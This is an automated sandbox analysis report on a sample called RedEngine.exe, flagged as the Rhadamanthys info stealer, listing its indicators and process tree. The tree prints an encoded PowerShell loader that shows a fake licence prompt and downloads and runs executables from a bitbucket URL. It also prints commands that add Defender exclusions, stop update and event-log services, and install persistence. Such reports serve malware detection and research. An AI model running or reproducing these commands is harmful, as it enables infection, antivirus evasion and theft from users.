Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 17:02
Static task
static1
Behavioral task
behavioral1
Sample
RedEngine.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
RedEngine.exe
Resource
win10v2004-20240226-en
General
-
Target
RedEngine.exe
-
Size
74KB
-
MD5
8fb7a6bd32200aea3f517923285e39a8
-
SHA1
dc5c1e8293cce5d82c5d7d338fb3cee57d2b997d
-
SHA256
ccc95afa02727297eb7f6bbbe5e06d011ce4656c3b563e2841fad60d471e2f26
-
SHA512
1445bc293350022e9302374df3915e71f3b8bd281db5a43bf67362b002896404e21a58e68963a6203d6ab04dffd5745c2ce1d2fbd650975936b327befa15e3a1
-
SSDEEP
384:UWWFjyor85Z6coSQJ14p9FfVg6FHkosvxB2JeJhrpX5m4KbfocN4UCMfKqIOmRUG:ua5ZRo34pdsvpA1c3UzD9eXOeOiict9
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
liccheck.exedescription pid process target process PID 2040 created 2612 2040 liccheck.exe sihost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 15 2740 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RedEngine.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation RedEngine.exe -
Executes dropped EXE 4 IoCs
Processes:
lic.exeliccheck.exeLicGet.exeebvoxlrooljj.exepid process 3504 lic.exe 2040 liccheck.exe 3448 LicGet.exe 2040 ebvoxlrooljj.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
LicGet.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " LicGet.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.exelic.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe lic.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lic.exedescription pid process target process PID 3504 set thread context of 1448 3504 lic.exe dialer.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4964 sc.exe 3656 sc.exe 3664 sc.exe 5060 sc.exe 3604 sc.exe 1632 sc.exe 2504 sc.exe 3644 sc.exe 4088 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 47 IoCs
Processes:
powershell.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
powershell.exepowershell.exeliccheck.exedialer.exelic.exepowershell.exedialer.exeebvoxlrooljj.exepowershell.exepid process 2740 powershell.exe 2740 powershell.exe 3076 powershell.exe 3076 powershell.exe 2040 liccheck.exe 2040 liccheck.exe 3988 dialer.exe 3988 dialer.exe 3988 dialer.exe 3988 dialer.exe 3504 lic.exe 3144 powershell.exe 3144 powershell.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 1448 dialer.exe 1448 dialer.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 3504 lic.exe 2040 ebvoxlrooljj.exe 1448 dialer.exe 1448 dialer.exe 4476 powershell.exe 4476 powershell.exe -
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid process 2148 3220 3992 2904 3352 3060 4748 2768 452 4448 2724 972 860 3888 1992 1504 2792 1084 2900 4016 1344 5048 1580 1888 2740 2524 3808 3664 2220 4076 4468 2400 4208 2588 1364 724 3972 3168 4700 3076 960 4712 1756 1272 4376 1892 4720 4556 3996 3680 60 3412 2548 992 5032 4112 1476 4000 2764 5024 4496 3956 4868 692 -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowercfg.exelic.exepowercfg.exepowercfg.exepowercfg.exedialer.exepowershell.exedescription pid process Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 3076 powershell.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeShutdownPrivilege 3992 powercfg.exe Token: SeCreatePagefilePrivilege 3992 powercfg.exe Token: SeDebugPrivilege 3504 lic.exe Token: SeShutdownPrivilege 452 powercfg.exe Token: SeCreatePagefilePrivilege 452 powercfg.exe Token: SeShutdownPrivilege 3452 powercfg.exe Token: SeCreatePagefilePrivilege 3452 powercfg.exe Token: SeShutdownPrivilege 336 powercfg.exe Token: SeCreatePagefilePrivilege 336 powercfg.exe Token: SeDebugPrivilege 1448 dialer.exe Token: SeDebugPrivilege 4476 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RedEngine.exepowershell.exeliccheck.execmd.exelic.execmd.exedialer.exelsass.exedescription pid process target process PID 2240 wrote to memory of 2740 2240 RedEngine.exe powershell.exe PID 2240 wrote to memory of 2740 2240 RedEngine.exe powershell.exe PID 2240 wrote to memory of 2740 2240 RedEngine.exe powershell.exe PID 2740 wrote to memory of 3076 2740 powershell.exe powershell.exe PID 2740 wrote to memory of 3076 2740 powershell.exe powershell.exe PID 2740 wrote to memory of 3076 2740 powershell.exe powershell.exe PID 2740 wrote to memory of 3504 2740 powershell.exe lic.exe PID 2740 wrote to memory of 3504 2740 powershell.exe lic.exe PID 2740 wrote to memory of 2040 2740 powershell.exe liccheck.exe PID 2740 wrote to memory of 2040 2740 powershell.exe liccheck.exe PID 2740 wrote to memory of 2040 2740 powershell.exe liccheck.exe PID 2740 wrote to memory of 3448 2740 powershell.exe LicGet.exe PID 2740 wrote to memory of 3448 2740 powershell.exe LicGet.exe PID 2040 wrote to memory of 3988 2040 liccheck.exe dialer.exe PID 2040 wrote to memory of 3988 2040 liccheck.exe dialer.exe PID 2040 wrote to memory of 3988 2040 liccheck.exe dialer.exe PID 2040 wrote to memory of 3988 2040 liccheck.exe dialer.exe PID 2040 wrote to memory of 3988 2040 liccheck.exe dialer.exe PID 2556 wrote to memory of 2248 2556 cmd.exe wusa.exe PID 2556 wrote to memory of 2248 2556 cmd.exe wusa.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 3504 wrote to memory of 1448 3504 lic.exe dialer.exe PID 8 wrote to memory of 2392 8 cmd.exe choice.exe PID 8 wrote to memory of 2392 8 cmd.exe choice.exe PID 1448 wrote to memory of 616 1448 dialer.exe winlogon.exe PID 1448 wrote to memory of 668 1448 dialer.exe lsass.exe PID 1448 wrote to memory of 948 1448 dialer.exe svchost.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 1448 wrote to memory of 64 1448 dialer.exe dwm.exe PID 1448 wrote to memory of 512 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 428 1448 dialer.exe svchost.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 1448 wrote to memory of 1032 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1060 1448 dialer.exe svchost.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 1448 wrote to memory of 1068 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1156 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1184 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1304 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1312 1448 dialer.exe svchost.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe PID 668 wrote to memory of 2656 668 lsass.exe sysmon.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Modifies data under HKEY_USERS
PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2612
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2656
-
C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeQBkACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAZgBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAhACAAQwBvAG4AbgBlAGMAdAAgAHkAbwB1AHIAIABTAHQAZQBhAG0AIABhAGMAYwBvAHUAbgB0ACAAaQBuACAAbwByAGQAZQByACAAdABvACAAZwBlAHQAIABhACAAbABpAGMAZQBuAHMAZQAuACAATQBhAGsAZQAgAHMAdQByAGUAIAB0AGgAYQB0ACAAeQBvAHUAIABhAHIAZQAgAG4AbwB0ACAAdQBzAGkAbgBnACAAYQBsAHQAZQByAG4AYQB0AGkAdgBlACAAYQBjAGMAbwB1AG4AdAAsACAAbwB0AGgAZQByAHcAaQBzAGUAIABsAGkAYwBlAG4AcwBlACAAdwBpAGwAbAAgAG4AbwB0ACAAYgBlACAAZwBpAHYAZQBuAC4AIAAoAFQAaABpAHMAIABpAHMAIABkAG8AbgBlACAAdABvACAAcAByAGUAdgBlAG4AdAAgAGMAcgBhAGMAawBpAG4AZwApACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAegBxAGUAIwA+ADsAIgA7ADwAIwBsAGIAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAYwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcwBpACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZABhAGcAZQB3AGgALwB0AGUAcwB0ADYAMwA0ADIANQAvAHIAYQB3AC8AMwAwADAANQBkAGQAMgBkADUANwAzADcAOQA4ADMAMQAyADQAMwAwADEAYQBkADgANgA0ADIANwA4AGYAZgA1ADMAMwBjAGMAOQA3ADEAYQAvAEwAZQB2AGkAUAByAG8AdAAuAGUAeABlACcALAAgADwAIwB6AHEAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAagBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAbQBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApACkAPAAjAHQAZgB2ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBkAGEAZwBlAHcAaAAvAHQAZQBzAHQANgAzADQAMgA1AC8AcgBhAHcALwAzADAAMAA1AGQAZAAyAGQANQA3ADMANwA5ADgAMwAxADIANAAzADAAMQBhAGQAOAA2ADQAMgA3ADgAZgBmADUAMwAzAGMAYwA5ADcAMQBhAC8ATABlAHYAaQBhAHQAaABhAG4ALgBlAHgAZQAnACwAIAA8ACMAagBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHYAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBsAGkAYwBjAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAdQBjAGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGQAYQBnAGUAdwBoAC8AdABlAHMAdAA2ADMANAAyADUALwByAGEAdwAvADMAMAAwADUAZABkADIAZAA1ADcAMwA3ADkAOAAzADEAMgA0ADMAMAAxAGEAZAA4ADYANAAyADcAOABmAGYANQAzADMAYwBjADkANwAxAGEALwBMAGUAdgBpAHQAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAeQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABwAHgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB0AGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAdwBrAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABnAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAZABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApADwAIwBpAGcAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHoAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQB6AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABpAGMAYwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwBoAHAAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHEAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABpAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAPAAjAGsAcwBrACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#ufh#>[System.Windows.Forms.MessageBox]::Show('No license! Connect your Steam account in order to get a license. Make sure that you are not using alternative account, otherwise license will not be given. (This is done to prevent cracking)','','OK','Warning')<#zqe#>;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076 -
C:\Users\Admin\AppData\Roaming\lic.exe"C:\Users\Admin\AppData\Roaming\lic.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2248
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5060 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3604 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1632 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2504 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:4964 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3452 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:336 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992 -
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "FJIEXRSL"4⤵
- Launches sc.exe
PID:3644 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "FJIEXRSL" binpath= "C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe" start= "auto"4⤵
- Launches sc.exe
PID:3656 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3664 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "FJIEXRSL"4⤵
- Launches sc.exe
PID:4088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\lic.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:2392
-
C:\Users\Admin\AppData\Roaming\liccheck.exe"C:\Users\Admin\AppData\Roaming\liccheck.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\AppData\Roaming\LicGet.exe"C:\Users\Admin\AppData\Roaming\LicGet.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3448
-
C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exeC:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2040 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
